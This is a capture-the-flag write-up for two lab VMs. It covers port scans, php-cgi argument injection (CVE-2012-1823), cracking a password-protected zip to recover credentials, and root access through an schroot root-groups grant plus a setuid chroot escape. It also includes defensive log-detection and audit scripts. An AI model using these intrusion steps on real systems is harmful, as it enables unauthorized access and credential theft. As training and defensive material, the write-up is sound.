
Hacker’s Dome – Double Kill | The Official Writeup

Download links for the machine images:

We recommend running the machine images inside VirtualBox, which is the hypervisor we used to create the challenges. Installing and running these images should be trivial.

The credentials for accessing the machines are (updated on 22nd of August, 2014):

  • ctf02-01: ubuntu with 4;9M3kr%5jn0otCca>]eVO.,Vog>ml7[
  • ctf02-02: root with 7m[Y5TNz')6`|@p:JLP"A\#M*6<4J~lz

ctf02-01, IP address: 10.200.0.4

Enumeration:

nmap -sS -p 1-65535 10.200.0.4

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 12:39 EEST
Nmap scan report for 10.200.0.4
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:DF:18:9D (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 8.37 seconds

Scan the HTTP server:

nikto -host 10.200.0.4 -C all
- Nikto v2.1.6
—————————————————————————
+ Target IP: 10.200.0.4
+ Target Hostname: 10.200.0.4
+ Target Port: 80
+ Start Time: 2014-08-13 12:41:17 (GMT3)
—————————————————————————
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 13:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 22354 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2014-08-13 12:42:51 (GMT3) (94 seconds)
—————————————————————————
+ 1 host(s) tested

The most interesting finding is the line “+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution.” This is CVE-2012-1823: PHP is running as a CGI binary, and a query string with no “=” in it is handed to php-cgi as command-line arguments. That argument injection can be used to achieve remote code execution.
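From the defender's side, the useful question is how to spot these probes in the web server logs. The following is an added example, not part of the original writeup: it parses Apache combined-format access log lines and flags requests whose query string would reach php-cgi on the command line (no unencoded “=”, first decoded token starting with “-”). The log lines, client addresses and function names are constructed for the example.

```python
import re
import urllib.parse

# Constructed Apache combined-log lines (not from the writeup); the first two mimic
# the probe nikto reported (/?-s) and its URL-encoded form, the rest are benign.
SAMPLE_LOG = """\
10.200.0.99 - - [13/Aug/2014:12:42:10 +0300] "GET /?-s HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.200.0.99 - - [13/Aug/2014:12:42:11 +0300] "GET /index.php?%2Ds HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.200.0.50 - - [13/Aug/2014:12:45:00 +0300] "GET /index.php?page=-1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.200.0.50 - - [13/Aug/2014:12:45:02 +0300] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.200.0.50 - - [13/Aug/2014:12:45:03 +0300] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def is_cgi_arg_injection(target: str) -> bool:
    """True when the query string would reach php-cgi as command-line options.

    RFC 3875 section 4.4 makes the web server pass QUERY_STRING on the command line
    only when it contains no unencoded '='. CVE-2012-1823 is php-cgi honouring those
    arguments, so a query without '=' whose first decoded token starts with '-' is the
    shape to alert on. Ordinary key=value queries (and the ?=PHPE... easter-egg
    probes nikto also sends) never match.
    """
    raw_query = urllib.parse.urlsplit(target).query
    if not raw_query or "=" in raw_query:
        return False
    tokens = urllib.parse.unquote_plus(raw_query).split()
    return bool(tokens) and tokens[0].startswith("-")


def scan_log(text: str) -> list:
    """Return (client_ip, request_target) for every line that matches the pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_cgi_arg_injection(m.group("target")):
            hits.append((m.group("ip"), m.group("target")))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"php-cgi argument injection probe from {ip}: {target}")
```

Run it against a real access log by reading the file into `scan_log`. The check deliberately looks at the raw, still-encoded query for the “=” character, because that is the test the web server itself applies before building argv; decoding first would miss probes that hide the “=” as %3D. Alerting is only half of the fix: the host in this writeup runs PHP 5.3.10 as a CGI binary, and the durable remedy is upgrading PHP beyond the affected releases or not serving PHP through php-cgi at all.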

Screenshot: ctf02-01-php-source-code

Metasploit’s php_cgi_arg_injection module is appropriate for getting a foothold on this machine.

Screenshot: ctf02-01-foothold

Side note: /cgi-bin is actually linked to /usr/bin. The above vulnerability is not required to gain a foothold. You do have to get a little bit creative in order to exploit the machine via this method, but I’m leaving this out as homework.

As the machine runs the 3.2.0-23-generic kernel, you can find an exploit for it on exploit-db.com.

From there, getting to root is easy, since gcc is already installed for your convenience.

Screenshot: ctf02-01-pwn

ctf02-02, IP address: 10.200.0.6

This machine was a pain in the ass for most of you but you may learn some new things while trying to take it down.

Enumeration:

nmap -sS -p 1-65535 10.200.0.6

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 13:48 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00072s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:48:04:9C (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds

Using scanners like nikto doesn’t really help on this target:

nikto -host 10.200.0.6 -C all
- Nikto v2.1.6
—————————————————————————
+ Target IP: 10.200.0.6
+ Target Hostname: 10.200.0.6
+ Target Port: 80
+ Start Time: 2014-08-13 13:50:18 (GMT3)
—————————————————————————
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 262222, size: 150, mtime: Fri Jul 25 23:31:47 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 22354 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2014-08-13 13:51:30 (GMT3) (72 seconds)
—————————————————————————
+ 1 host(s) tested

Moving forward, there are a couple of viable methods that we can use. They both take about the same amount of time.

First method: read the source code of the index, then go to the directory indicated by the served image:

Screenshot: ctf02-02-manual-analysis-fs8

The second method is to use DirBuster with a directory list like /usr/share/dirbuster/wordlists/directory-list-1.0.txt. It should quickly log interesting information such as:

dirbuster
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /cgi-bin/ - 403
Dir found: / - 200
Dir found: /i-can-has/ - 200
File found: /i-can-has/credentials.zip - 200
Dir found: /icons/ - 403

Anyway, the result is the same:

Screenshot: ctf02-02-i-can-has

From here, getting something useful will take some time, but it isn’t impossible:

wget http://10.200.0.6/i-can-has/credentials.zip
--2014-08-13 13:59:51--  http://10.200.0.6/i-can-has/credentials.zip
Connecting to 10.200.0.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 248 [application/zip]
Saving to: `credentials.zip'

100%[=============================================================>] 248         --.-K/s   in 0s

2014-08-13 13:59:51 (31.7 MB/s) - `credentials.zip' saved [248/248]

unzip credentials.zip
Archive: credentials.zip
[credentials.zip] credentials.txt password:
skipping: credentials.txt incorrect password

fcrackzip --dictionary --use-unzip --init-password /usr/share/wordlists/rockyou.txt credentials.zip

PASSWORD FOUND!!!!: pw == arisha786

unzip credentials.zip
Archive: credentials.zip
[credentials.zip] credentials.txt password:
extracting: credentials.txt

cat credentials.txt
foobar:r+:/,3{0WU<5%"OxDa=c=E)7%JMI35"R

This challenge also makes a point about protecting your password vault with a weak password: a strong credential inside the archive is worth nothing when the archive password is in rockyou.txt.

With this new information, getting a foothold is easy:

Screenshot: ctf02-02-foothold

However, moving on from this point may not be so easy. Some of you tried to hit the machine with every exploit that’s even remotely close to what the machine is actually running. Some of you even used 32-bit exploits, even though the machine runs a 64-bit build.

During the competition I gave you an important hint: stop doing what you’re doing and start enumerating. Those who listened, moved to the next step.

Here’s what most of you missed on a fully patched machine: the binaries with the setuid attribute.

Screenshot: ctf02-02-setuid-enum

This enumeration shows a couple of important bits: the presence of /usr/bin/schroot and the presence of another userland in /srv/buildd. A little bit of RTFM on schroot (man schroot, man schroot.conf) reveals the next clue:

cat /etc/schroot/schroot.conf
[buildd]
description=buildd
aliases=buildd
type=directory
directory=/srv/buildd
root-groups=foobar
personality=linux

The interesting line in that config file is root-groups=foobar, the group counterpart of root-users: members of the listed groups get password-less root inside the chroot. The manual entry for root-users explains what that means:

root-users=user1,user2,…
A comma-separated list of users which are allowed password-less root access to the chroot. If empty or omitted, no users will be allowed root access without a password (but if a user or a group they belong to is in users or groups, respectively, they may gain access with a password). See the section “Security” below.

You just need to read the help of schroot to figure out that the minimum set of options for getting into the chroot as root is: schroot -u root -c buildd.

Screenshot: ctf02-02-chroot-root

The challenge isn’t over yet, as you still need to escape the chroot. The easiest method is to set the setuid bit on a root-owned binary inside the chroot, then execute that binary from the host machine:

Screenshot: ctf02-02-pwn

Because the userland inside the chroot is 32-bit while the host is 64-bit, you need to copy a binary from the host into a location that is visible inside the chroot.

You can also pwn the chroot the hard way with a classic chroot evasion. I am leaving this part as homework. Transferring files into the chroot, or editing files from inside it, isn’t covered by the usual suspects, so you might learn something new if you try this.
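The two enumeration steps that decided this box, listing setuid binaries and reading schroot.conf for root-users/root-groups grants, are exactly what a host audit should run before an attacker does, and the escape just described leaves a detectable artifact: a root-owned setuid file inside the chroot tree. The following is an added example, not code from the writeup: it parses a schroot.conf and reports profiles that grant password-less root, and walks a directory tree for setuid files. The sample config copies the [buildd] profile from the writeup and adds a made-up [clean] profile; the throwaway demo tree stands in for /srv/buildd and all function names are constructed.

```python
import configparser
import os
import stat
import tempfile

# Constructed schroot.conf for offline use: [buildd] copies the profile shown in the
# writeup, [clean] is a made-up profile that grants no root access.
SAMPLE_SCHROOT_CONF = """\
[buildd]
description=buildd
aliases=buildd
type=directory
directory=/srv/buildd
root-groups=foobar
personality=linux

[clean]
description=build environment without root grants
type=directory
directory=/srv/clean
users=builder
"""


def risky_schroot_profiles(conf_text: str) -> dict:
    """Map profile name -> list of 'key=value' strings that grant password-less root.

    schroot.conf is INI-style; root-users and root-groups list the principals that
    get root inside the chroot without a password (see schroot.conf(5)).
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(conf_text)
    findings = {}
    for profile in cp.sections():
        for key in ("root-users", "root-groups"):
            value = cp.get(profile, key, fallback="").strip()
            if value:
                findings.setdefault(profile, []).append(f"{key}={value}")
    return findings


def find_setuid(root: str) -> list:
    """Return sorted (relative path, owner uid) of regular files under root with the setuid bit.

    Pointed at a profile's directory= this shows the artifact the escape above leaves
    behind: a setuid binary planted inside the chroot tree, owned by root or by
    whichever uid the planter used.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)  # lstat: do not follow symlinks that may point out of the tree
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((os.path.relpath(path, root), st.st_uid))
    return sorted(hits)


def build_demo_chroot() -> str:
    """Create a throwaway directory tree with one setuid file, standing in for /srv/buildd."""
    root = tempfile.mkdtemp(prefix="demo-chroot-")
    os.makedirs(os.path.join(root, "bin"))
    for name, mode in (("sh", 0o4755), ("ls", 0o755)):
        path = os.path.join(root, "bin", name)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\n")  # placeholder content; only the mode bits matter here
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for profile, grants in risky_schroot_profiles(SAMPLE_SCHROOT_CONF).items():
        print(f"[{profile}] grants password-less root: {', '.join(grants)}")
    demo = build_demo_chroot()
    for rel, uid in find_setuid(demo):
        print(f"setuid file inside chroot tree: {rel} (owner uid {uid})")
```

On a real host, feed `/etc/schroot/schroot.conf` to `risky_schroot_profiles` and each reported profile's `directory=` to `find_setuid`; a setuid file appearing under a chroot tree that a non-root group can enter as root is the signal to act on. The mitigations follow from the findings: keep root-users/root-groups empty unless the listed principals are already trusted with root on the host, and mount chroot trees with nosuid so that a setuid bit planted from inside is not honoured when the file is executed from outside.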
